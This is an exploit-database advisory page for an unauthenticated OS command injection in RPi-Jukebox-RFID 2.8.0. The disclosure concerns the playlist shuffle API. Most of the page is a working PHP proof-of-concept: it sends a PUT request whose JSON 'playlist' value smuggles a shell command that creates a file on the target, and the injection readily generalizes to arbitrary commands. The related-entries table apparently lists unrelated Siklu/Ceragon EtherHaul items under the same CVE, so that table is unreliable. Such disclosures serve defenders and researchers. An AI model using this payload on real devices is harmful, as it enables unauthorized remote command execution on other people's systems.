📄 RPi-Jukebox-RFID 2.8.0 Command Injection

🗓️ 23 Jan 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 112 Views

RPi-Jukebox-RFID 2.8.0 has unauthenticated OS command injection in /phoniebox/api/playlist/shuffle.php via playlist parameter.

Reporter	Title	Published	Views	Family All 15
GithubExploit	Exploit for CVE-2025-57176	24 Sep 202522:16	–	githubexploit
Circl	CVE-2025-57176	24 Sep 202520:16	–	circl
CNNVD	Ceragon EtherHaul series 代码问题漏洞	15 Sep 202500:00	–	cnnvd
CVE	CVE-2025-57176	15 Sep 202500:00	–	cve
Cvelist	CVE-2025-57176	15 Sep 202500:00	–	cvelist
Exploit DB	Siklu EtherHaul Series EH-8010 - Arbitrary File Upload	17 Jan 202600:00	–	exploitdb
EUVD	EUVD-2025-29215	3 Oct 202520:07	–	euvd
ICS	Ceragon Siklu MultiHaul and EtherHaul Series	10 Mar 202605:00	–	ics
NVD	CVE-2025-57176	15 Sep 202517:15	–	nvd
Packet Storm	📄 Siklu EtherHaul Series EH-8010 / EH-1200 Arbitrary File Upload	20 Jan 202600:00	–	packetstorm

=============================================================================================================================================
    | # Title     : RPi-Jukebox-RFID 2.8.0 OS Command Injection                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/MiczFlor/RPi-Jukebox-RFID                                                                                |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176
    
    [+] Summary    : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
                     /phoniebox/api/playlist/shuffle.php
                     The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
    				 remote attackers to execute arbitrary system commands.
    
    [+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.
    
             php poc.php 
    
    <?php
    
    
    $target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";
    
    $injectedCommand = "test';touch indoushka.txt;echo '";
    
    $data = json_encode([
        "playlist" => $injectedCommand,
        "shuffle"  => "true"
    ]);
    
    $headers = [
        "Content-Type: application/json",
        "User-Agent: Mozilla/5.0"
    ];
    
    $ch = curl_init($target);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    
    echo "[+] Sending malicious JSON payload...\n";
    $response = curl_exec($ch);
    
    if ($response === false) {
        echo "[-] cURL Error: " . curl_error($ch) . "\n";
    } else {
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        echo "[+] HTTP Status Code: {$httpCode}\n";
        echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
    }
    
    curl_close($ch);
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

23 Jan 2026 00:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 3.14.3

EPSS0.0056

SSVC